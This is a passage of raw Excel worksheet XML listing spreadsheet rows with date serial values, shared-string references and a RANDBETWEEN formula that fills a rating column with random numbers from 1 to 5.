        <v>42921.620937500003</v>
      </c>
      <c r="C26407" t="s">
        <v>71</v>
      </c>
      <c r="E26407" s="2" t="s">
        <v>23995</v>
      </c>
      <c r="F26407">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26408" s="1">
        <v>42921.595601851855</v>
      </c>
      <c r="C26408" t="s">
        <v>10</v>
      </c>
      <c r="D26408" t="s">
        <v>80</v>
      </c>
      <c r="E26408" t="s">
        <v>23996</v>
      </c>
      <c r="F26408">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26409" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A26409" s="1">
        <v>42921.584930555553</v>
      </c>
      <c r="C26409" t="s">
        <v>48</v>
      </c>
      <c r="E26409" s="2" t="s">
        <v>23997</v>
      </c>
      <c r="F26409">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26410" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26410" s="1">
        <v>42921.568530092591</v>
      </c>
      <c r="C26410" t="s">
        <v>10</v>
      </c>
      <c r="D26410" t="s">
        <v>178</v>
      </c>
      <c r="E26410" t="s">
        <v>23998</v>
      </c>
      <c r="F26410">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26411" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A26411" s="1">
        <v>42921.548796296294</v>
      </c>
      <c r="C26411" t="s">
        <v>4970</v>
      </c>
      <c r="E26411" s="2" t="s">
        <v>23999</v>
      </c>
      <c r="F26411">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26412" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26412" s="1">
        <v>42921.519861111112</v>
      </c>
      <c r="C26412" t="s">
        <v>10</v>
      </c>
      <c r="D26412" t="s">
        <v>107</v>
      </c>
      <c r="E26412" t="s">
        <v>24000</v>
      </c>
      <c r="F26412">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26413" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A26413" s="1">
        <v>42921.503333333334</v>
      </c>
      <c r="C26413" t="s">
        <v>10</v>
      </c>
      <c r="D26413" t="s">
        <v>20</v>
      </c>
      <c r="E26413" s="2" t="s">
        <v>24001</v>
      </c>
      <c r="F26413">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26414" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26414" s="1">
        <v>42921.487997685188</v>
      </c>
      <c r="C26414" t="s">
        <v>3027</v>
      </c>
      <c r="E26414" s="2" t="s">
        <v>24002</v>
      </c>
      <c r="F26414">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26415" s="1">
        <v>42921.480775462966</v>
      </c>
      <c r="C26415" t="s">
        <v>10</v>
      </c>
      <c r="D26415" t="s">
        <v>36</v>
      </c>
      <c r="E26415" t="s">
        <v>24003</v>
      </c>
      <c r="F26415">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26416" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26416" s="1">
        <v>42921.476956018516</v>
      </c>
      <c r="C26416" t="s">
        <v>41</v>
      </c>
      <c r="E26416" s="2" t="s">
        <v>24004</v>
      </c>
      <c r="F26416">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26417" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26417" s="1">
        <v>42921.419594907406</v>
      </c>
      <c r="C26417" t="s">
        <v>10</v>
      </c>
      <c r="D26417" t="s">
        <v>17</v>
      </c>
      <c r="E26417" t="s">
        <v>24005</v>
      </c>
      <c r="F26417">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26418" s="1">
        <v>42921.40996527778</v>
      </c>
      <c r="C26418" t="s">
        <v>6</v>
      </c>
      <c r="D26418" t="s">
        <v>25</v>
      </c>
      <c r="E26418" t="s">
        <v>24006</v>
      </c>
      <c r="F26418">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26419" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26419" s="1">
        <v>42921.401736111111</v>
      </c>
      <c r="C26419" t="s">
        <v>65</v>
      </c>
      <c r="E26419" s="2" t="s">
        <v>24007</v>
      </c>
      <c r="F26419">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26420" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26420" s="1">
        <v>42921.401099537034</v>
      </c>
      <c r="C26420" t="s">
        <v>10</v>
      </c>
      <c r="D26420" t="s">
        <v>86</v>
      </c>
      <c r="E26420" s="2" t="s">
        <v>24008</v>
      </c>
      <c r="F26420">
        <f t="shared" ca="1" si="412"/>
        <v>4</v>
      </c>
    </row>
    <row r="26421" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26421" s="1">
        <v>42921.363912037035</v>
      </c>
      <c r="C26421" t="s">
        <v>103</v>
      </c>
      <c r="E26421" s="2" t="s">
        <v>24009</v>
      </c>
      <c r="F26421">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26422" s="1">
        <v>42921.359594907408</v>
      </c>
      <c r="C26422" t="s">
        <v>6</v>
      </c>
      <c r="D26422" t="s">
        <v>82</v>
      </c>
      <c r="E26422" t="s">
        <v>24010</v>
      </c>
      <c r="F26422">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26423" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26423" s="1">
        <v>42921.340127314812</v>
      </c>
      <c r="C26423" t="s">
        <v>10</v>
      </c>
      <c r="D26423" t="s">
        <v>36</v>
      </c>
      <c r="E26423" t="s">
        <v>24011</v>
      </c>
      <c r="F26423">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26424" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26424" s="1">
        <v>42921.321412037039</v>
      </c>
      <c r="C26424" t="s">
        <v>71</v>
      </c>
      <c r="E26424" s="2" t="s">
        <v>24012</v>
      </c>
      <c r="F26424">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26425" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26425" s="1">
        <v>42921.267743055556</v>
      </c>
      <c r="C26425" t="s">
        <v>41</v>
      </c>
      <c r="E26425" t="s">
        <v>24013</v>
      </c>
      <c r="F26425">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26426" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26426" s="1">
        <v>42921.265069444446</v>
      </c>
      <c r="C26426" t="s">
        <v>65</v>
      </c>
      <c r="E26426" t="s">
        <v>24014</v>
      </c>
      <c r="F26426">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26427" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26427" s="1">
        <v>42921.229629629626</v>
      </c>
      <c r="C26427" t="s">
        <v>41</v>
      </c>
      <c r="E26427" t="s">
        <v>24015</v>
      </c>
      <c r="F26427">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26428" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26428" s="1">
        <v>42921.217824074076</v>
      </c>
      <c r="C26428" t="s">
        <v>65</v>
      </c>
      <c r="E26428" s="2" t="s">
        <v>24016</v>
      </c>
      <c r="F26428">
        <f t="shared" ca="1" si="412"/>
        <v>2</v>
      </c>
    </row>
    <row r="26429" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26429" s="1">
        <v>42921.201145833336</v>
      </c>
      <c r="C26429" t="s">
        <v>197</v>
      </c>
      <c r="E26429" s="2" t="s">
        <v>24017</v>
      </c>
      <c r="F26429">
        <f t="shared" ca="1" si="412"/>
        <v>3</v>
      </c>
    </row>
    <row r="26430" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26430" s="1">
        <v>42921.192418981482</v>
      </c>
      <c r="C26430" t="s">
        <v>314</v>
      </c>
      <c r="E26430" s="2" t="s">
        <v>24018</v>
      </c>
      <c r="F26430">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26431" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26431" s="1">
        <v>42921.173402777778</v>
      </c>
      <c r="C26431" t="s">
        <v>731</v>
      </c>
      <c r="E26431" t="s">
        <v>24019</v>
      </c>
      <c r="F26431">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26432" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26432" s="1">
        <v>42921.166458333333</v>
      </c>
      <c r="C26432" t="s">
        <v>69</v>
      </c>
      <c r="E26432" s="2" t="s">
        <v>24020</v>
      </c>
      <c r="F26432">
        <f t="shared" ca="1" si="412"/>
        <v>5</v>
      </c>
    </row>
    <row r="26433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26433" s="1">
        <v>42921.159363425926</v>
      </c>
      <c r="C26433" t="s">
        <v>65</v>
      </c>
      <c r="E26433" t="s">
        <v>24021</v>
      </c>
      <c r="F26433">
        <f t="shared" ca="1" si="412"/>
        <v>1</v>
      </c>
    </row>
    <row r="26434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26434" s="1">
        <v>42921.094074074077</v>
      </c>
      <c r="C26434" t="s">
        <v>41</v>
      </c>
      <c r="E26434" t="s">
        <v>24022</v>
      </c>
      <c r="F26434">
        <f t="shared" ref="F26434:F26497" ca="1" si="413">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="26435" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26435" s="1">
        <v>42920.948229166665</v>
      </c>
      <c r="C26435" t="s">
        <v>229</v>
      </c>
      <c r="E26435" t="s">
        <v>24023</v>
      </c>
      <c r="F26435">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26436" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26436" s="1">
        <v>42920.768518518518</v>
      </c>
      <c r="C26436" t="s">
        <v>140</v>
      </c>
      <c r="D26436" t="s">
        <v>234</v>
      </c>
      <c r="E26436" s="2" t="s">
        <v>24024</v>
      </c>
      <c r="F26436">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26437" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26437" s="1">
        <v>42920.715312499997</v>
      </c>
      <c r="C26437" t="s">
        <v>260</v>
      </c>
      <c r="E26437" s="2" t="s">
        <v>24025</v>
      </c>
      <c r="F26437">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26438" s="1">
        <v>42920.537974537037</v>
      </c>
      <c r="C26438" t="s">
        <v>71</v>
      </c>
      <c r="E26438" t="s">
        <v>24026</v>
      </c>
      <c r="F26438">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26439" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26439" s="1">
        <v>42920.535000000003</v>
      </c>
      <c r="C26439" t="s">
        <v>48</v>
      </c>
      <c r="E26439" s="2" t="s">
        <v>24027</v>
      </c>
      <c r="F26439">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26440" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26440" s="1">
        <v>42920.525254629632</v>
      </c>
      <c r="C26440" t="s">
        <v>10</v>
      </c>
      <c r="D26440" t="s">
        <v>6</v>
      </c>
      <c r="E26440" t="s">
        <v>24028</v>
      </c>
      <c r="F26440">
        <f t="shared" ca="1" si="413"/>
        <v>5</v>
      </c>
    </row>
    <row r="26441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26441" s="1">
        <v>42920.502256944441</v>
      </c>
      <c r="C26441" t="s">
        <v>65</v>
      </c>
      <c r="E26441" t="s">
        <v>24029</v>
      </c>
      <c r="F26441">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26442" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26442" s="1">
        <v>42920.491574074076</v>
      </c>
      <c r="C26442" t="s">
        <v>9064</v>
      </c>
      <c r="E26442" t="s">
        <v>24030</v>
      </c>
      <c r="F26442">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26443" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26443" s="1">
        <v>42920.457499999997</v>
      </c>
      <c r="C26443" t="s">
        <v>6</v>
      </c>
      <c r="D26443" t="s">
        <v>25</v>
      </c>
      <c r="E26443" s="2" t="s">
        <v>24031</v>
      </c>
      <c r="F26443">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26444" s="1">
        <v>42920.432129629633</v>
      </c>
      <c r="C26444" t="s">
        <v>319</v>
      </c>
      <c r="E26444" t="s">
        <v>24032</v>
      </c>
      <c r="F26444">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26445" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26445" s="1">
        <v>42920.387812499997</v>
      </c>
      <c r="C26445" t="s">
        <v>71</v>
      </c>
      <c r="E26445" t="s">
        <v>24033</v>
      </c>
      <c r="F26445">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26446" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26446" s="1">
        <v>42920.355011574073</v>
      </c>
      <c r="C26446" t="s">
        <v>43</v>
      </c>
      <c r="E26446" s="2" t="s">
        <v>24034</v>
      </c>
      <c r="F26446">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26447" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26447" s="1">
        <v>42920.345011574071</v>
      </c>
      <c r="C26447" t="s">
        <v>1688</v>
      </c>
      <c r="E26447" t="s">
        <v>24035</v>
      </c>
      <c r="F26447">
        <f t="shared" ca="1" si="413"/>
        <v>5</v>
      </c>
    </row>
    <row r="26448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26448" s="1">
        <v>42920.335370370369</v>
      </c>
      <c r="C26448" t="s">
        <v>41</v>
      </c>
      <c r="D26448" t="s">
        <v>312</v>
      </c>
      <c r="E26448" t="s">
        <v>24036</v>
      </c>
      <c r="F26448">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26449" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26449" s="1">
        <v>42920.313981481479</v>
      </c>
      <c r="C26449" t="s">
        <v>1080</v>
      </c>
      <c r="E26449" s="2" t="s">
        <v>24037</v>
      </c>
      <c r="F26449">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26450" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26450" s="1">
        <v>42920.313738425924</v>
      </c>
      <c r="C26450" t="s">
        <v>69</v>
      </c>
      <c r="E26450" s="2" t="s">
        <v>24038</v>
      </c>
      <c r="F26450">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26451" s="1">
        <v>42920.305034722223</v>
      </c>
      <c r="C26451" t="s">
        <v>124</v>
      </c>
      <c r="E26451" t="s">
        <v>24039</v>
      </c>
      <c r="F26451">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26452" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26452" s="1">
        <v>42920.289687500001</v>
      </c>
      <c r="C26452" t="s">
        <v>559</v>
      </c>
      <c r="E26452" s="2" t="s">
        <v>24040</v>
      </c>
      <c r="F26452">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26453" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26453" s="1">
        <v>42920.281157407408</v>
      </c>
      <c r="C26453" t="s">
        <v>43</v>
      </c>
      <c r="E26453" s="2" t="s">
        <v>24041</v>
      </c>
      <c r="F26453">
        <f t="shared" ca="1" si="413"/>
        <v>5</v>
      </c>
    </row>
    <row r="26454" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A26454" s="1">
        <v>42920.269780092596</v>
      </c>
      <c r="C26454" t="s">
        <v>10</v>
      </c>
      <c r="D26454" t="s">
        <v>192</v>
      </c>
      <c r="E26454" s="2" t="s">
        <v>24042</v>
      </c>
      <c r="F26454">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26455" s="1">
        <v>42920.233611111114</v>
      </c>
      <c r="C26455" t="s">
        <v>139</v>
      </c>
      <c r="E26455" t="s">
        <v>24043</v>
      </c>
      <c r="F26455">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26456" s="1">
        <v>42920.230775462966</v>
      </c>
      <c r="C26456" t="s">
        <v>71</v>
      </c>
      <c r="E26456" t="s">
        <v>24044</v>
      </c>
      <c r="F26456">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26457" s="1">
        <v>42920.226261574076</v>
      </c>
      <c r="C26457" t="s">
        <v>92</v>
      </c>
      <c r="E26457" t="s">
        <v>24045</v>
      </c>
      <c r="F26457">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26458" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26458" s="1">
        <v>42920.218240740738</v>
      </c>
      <c r="C26458" t="s">
        <v>65</v>
      </c>
      <c r="E26458" s="2" t="s">
        <v>24046</v>
      </c>
      <c r="F26458">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26459" s="1">
        <v>42920.209837962961</v>
      </c>
      <c r="C26459" t="s">
        <v>124</v>
      </c>
      <c r="E26459" t="s">
        <v>24047</v>
      </c>
      <c r="F26459">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26460" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26460" s="1">
        <v>42920.189409722225</v>
      </c>
      <c r="C26460" t="s">
        <v>71</v>
      </c>
      <c r="E26460" s="2" t="s">
        <v>24048</v>
      </c>
      <c r="F26460">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26461" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A26461" s="1">
        <v>42920.182696759257</v>
      </c>
      <c r="C26461" t="s">
        <v>2545</v>
      </c>
      <c r="E26461" s="2" t="s">
        <v>24049</v>
      </c>
      <c r="F26461">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26462" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26462" s="1">
        <v>42920.142175925925</v>
      </c>
      <c r="C26462" t="s">
        <v>48</v>
      </c>
      <c r="E26462" s="2" t="s">
        <v>24050</v>
      </c>
      <c r="F26462">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26463" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26463" s="1">
        <v>42920.125694444447</v>
      </c>
      <c r="C26463" t="s">
        <v>65</v>
      </c>
      <c r="E26463" s="2" t="s">
        <v>24051</v>
      </c>
      <c r="F26463">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26464" s="1">
        <v>42919.903344907405</v>
      </c>
      <c r="C26464" t="s">
        <v>139</v>
      </c>
      <c r="E26464" t="s">
        <v>24052</v>
      </c>
      <c r="F26464">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26465" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26465" s="1">
        <v>42919.903287037036</v>
      </c>
      <c r="C26465" t="s">
        <v>139</v>
      </c>
      <c r="E26465" t="s">
        <v>24052</v>
      </c>
      <c r="F26465">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26466" s="1">
        <v>42919.903252314813</v>
      </c>
      <c r="C26466" t="s">
        <v>139</v>
      </c>
      <c r="E26466" t="s">
        <v>24052</v>
      </c>
      <c r="F26466">
        <f t="shared" ca="1" si="413"/>
        <v>5</v>
      </c>
    </row>
    <row r="26467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26467" s="1">
        <v>42919.902962962966</v>
      </c>
      <c r="C26467" t="s">
        <v>139</v>
      </c>
      <c r="E26467" t="s">
        <v>24052</v>
      </c>
      <c r="F26467">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26468" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26468" s="1">
        <v>42919.718148148146</v>
      </c>
      <c r="C26468" t="s">
        <v>6</v>
      </c>
      <c r="D26468" t="s">
        <v>25</v>
      </c>
      <c r="E26468" t="s">
        <v>24053</v>
      </c>
      <c r="F26468">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26469" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26469" s="1">
        <v>42919.691331018519</v>
      </c>
      <c r="C26469" t="s">
        <v>82</v>
      </c>
      <c r="E26469" s="2" t="s">
        <v>24054</v>
      </c>
      <c r="F26469">
        <f t="shared" ca="1" si="413"/>
        <v>5</v>
      </c>
    </row>
    <row r="26470" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26470" s="1">
        <v>42919.620509259257</v>
      </c>
      <c r="C26470" t="s">
        <v>16</v>
      </c>
      <c r="E26470" t="s">
        <v>24055</v>
      </c>
      <c r="F26470">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26471" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26471" s="1">
        <v>42919.612847222219</v>
      </c>
      <c r="C26471" t="s">
        <v>10</v>
      </c>
      <c r="D26471" t="s">
        <v>23</v>
      </c>
      <c r="E26471" s="2" t="s">
        <v>24056</v>
      </c>
      <c r="F26471">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26472" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26472" s="1">
        <v>42919.608842592592</v>
      </c>
      <c r="C26472" t="s">
        <v>10</v>
      </c>
      <c r="D26472" t="s">
        <v>6</v>
      </c>
      <c r="E26472" s="2" t="s">
        <v>24057</v>
      </c>
      <c r="F26472">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26473" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26473" s="1">
        <v>42919.542141203703</v>
      </c>
      <c r="C26473" t="s">
        <v>10</v>
      </c>
      <c r="D26473" t="s">
        <v>20</v>
      </c>
      <c r="E26473" s="2" t="s">
        <v>24058</v>
      </c>
      <c r="F26473">
        <f t="shared" ca="1" si="413"/>
        <v>5</v>
      </c>
    </row>
    <row r="26474" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26474" s="1">
        <v>42919.470856481479</v>
      </c>
      <c r="C26474" t="s">
        <v>10</v>
      </c>
      <c r="D26474" t="s">
        <v>163</v>
      </c>
      <c r="E26474" s="2" t="s">
        <v>24059</v>
      </c>
      <c r="F26474">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26475" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26475" s="1">
        <v>42919.428483796299</v>
      </c>
      <c r="C26475" t="s">
        <v>454</v>
      </c>
      <c r="E26475" t="s">
        <v>24060</v>
      </c>
      <c r="F26475">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26476" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26476" s="1">
        <v>42919.427083333336</v>
      </c>
      <c r="C26476" t="s">
        <v>10</v>
      </c>
      <c r="D26476" t="s">
        <v>20</v>
      </c>
      <c r="E26476" t="s">
        <v>24061</v>
      </c>
      <c r="F26476">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26477" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A26477" s="1">
        <v>42919.403611111113</v>
      </c>
      <c r="C26477" t="s">
        <v>6</v>
      </c>
      <c r="D26477" t="s">
        <v>194</v>
      </c>
      <c r="E26477" s="2" t="s">
        <v>24062</v>
      </c>
      <c r="F26477">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26478" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26478" s="1">
        <v>42919.366331018522</v>
      </c>
      <c r="C26478" t="s">
        <v>10</v>
      </c>
      <c r="D26478" t="s">
        <v>80</v>
      </c>
      <c r="E26478" s="2" t="s">
        <v>24063</v>
      </c>
      <c r="F26478">
        <f t="shared" ca="1" si="413"/>
        <v>5</v>
      </c>
    </row>
    <row r="26479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26479" s="1">
        <v>42919.347337962965</v>
      </c>
      <c r="C26479" t="s">
        <v>48</v>
      </c>
      <c r="E26479" t="s">
        <v>24064</v>
      </c>
      <c r="F26479">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26480" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26480" s="1">
        <v>42919.346678240741</v>
      </c>
      <c r="C26480" t="s">
        <v>17</v>
      </c>
      <c r="E26480" s="2" t="s">
        <v>24065</v>
      </c>
      <c r="F26480">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26481" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26481" s="1">
        <v>42919.301168981481</v>
      </c>
      <c r="C26481" t="s">
        <v>41</v>
      </c>
      <c r="E26481" t="s">
        <v>24066</v>
      </c>
      <c r="F26481">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26482" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26482" s="1">
        <v>42919.300162037034</v>
      </c>
      <c r="C26482" t="s">
        <v>48</v>
      </c>
      <c r="E26482" s="2" t="s">
        <v>24067</v>
      </c>
      <c r="F26482">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26483" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26483" s="1">
        <v>42919.202141203707</v>
      </c>
      <c r="C26483" t="s">
        <v>41</v>
      </c>
      <c r="E26483" s="2" t="s">
        <v>24068</v>
      </c>
      <c r="F26483">
        <f t="shared" ca="1" si="413"/>
        <v>4</v>
      </c>
    </row>
    <row r="26484" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26484" s="1">
        <v>42919.188055555554</v>
      </c>
      <c r="C26484" t="s">
        <v>73</v>
      </c>
      <c r="E26484" t="s">
        <v>24069</v>
      </c>
      <c r="F26484">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26485" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26485" s="1">
        <v>42919.142326388886</v>
      </c>
      <c r="C26485" t="s">
        <v>314</v>
      </c>
      <c r="E26485" s="2" t="s">
        <v>24070</v>
      </c>
      <c r="F26485">
        <f t="shared" ca="1" si="413"/>
        <v>5</v>
      </c>
    </row>
    <row r="26486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26486" s="1">
        <v>42919.133553240739</v>
      </c>
      <c r="C26486" t="s">
        <v>60</v>
      </c>
      <c r="E26486" t="s">
        <v>24071</v>
      </c>
      <c r="F26486">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26487" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26487" s="1">
        <v>42919.119340277779</v>
      </c>
      <c r="C26487" t="s">
        <v>253</v>
      </c>
      <c r="E26487" s="2" t="s">
        <v>24072</v>
      </c>
      <c r="F26487">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26488" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26488" s="1">
        <v>42919.036469907405</v>
      </c>
      <c r="C26488" t="s">
        <v>140</v>
      </c>
      <c r="D26488" t="s">
        <v>46</v>
      </c>
      <c r="E26488" s="2" t="s">
